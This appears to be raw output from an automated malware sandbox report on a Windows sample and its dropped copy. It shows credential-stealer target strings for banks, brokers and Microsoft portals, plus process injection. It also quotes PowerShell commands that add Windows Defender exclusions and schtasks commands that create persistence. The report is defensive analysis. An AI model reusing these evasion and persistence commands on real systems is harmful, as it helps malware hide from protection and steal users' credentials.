Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595528
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595390
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595280
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595170
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 595062
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594843
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594722
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594594
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594484
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594375
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Thread delayed: delay time: 594265

Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696487552\|UE
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: SNKO05B241100201.exe, 00000000.00000002.1515648670.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: FCyhGFSukqIJpScrOS
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696487552f
Source: HURBBASu.exe, 00000009.00000002.1554687171.0000000000C18000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696487552x
Source: SNKO05B241100201.exe, 00000008.00000002.3928992900.0000000002E0E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd6146cff2451d<
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696487552o
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3927104074.0000000000E68000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllb
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696487552d
Source: SNKO05B241100201.exe, 00000008.00000002.3927400126.0000000000F46000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696487552j
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696487552]
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696487552x
Source: HURBBASu.exe, 0000000D.00000002.3929285502.0000000002F0C000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: qEmultipart/form-data; boundary=------------------------8dd613809692b18<
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696487552h
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696487552t
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696487552s
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696487552
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: HURBBASu.exe, 0000000D.00000002.3933792755.0000000003FA0000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Code function: 8_2_069E9668 LdrInitializeThunk,

8_2_069E9668

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe"
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HURBBASu.exe"
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HURBBASu.exe"	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Memory written: C:\Users\user\Desktop\SNKO05B241100201.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Memory written: C:\Users\user\AppData\Roaming\HURBBASu.exe base: 400000 value starts with: 4D5A			Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\SNKO05B241100201.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HURBBASu.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp23A6.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Process created: C:\Users\user\Desktop\SNKO05B241100201.exe "C:\Users\user\Desktop\SNKO05B241100201.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HURBBASu" /XML "C:\Users\user\AppData\Local\Temp\tmp3588.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HURBBASu.exe	Process created: C:\Users\user\AppData\Roaming\HURBBASu.exe "C:\Users\user\AppData\Roaming\HURBBASu.exe"	Jump to behavior

Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Users\user\Desktop\SNKO05B241100201.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Users\user\Desktop\SNKO05B241100201.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\SNKO05B241100201.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
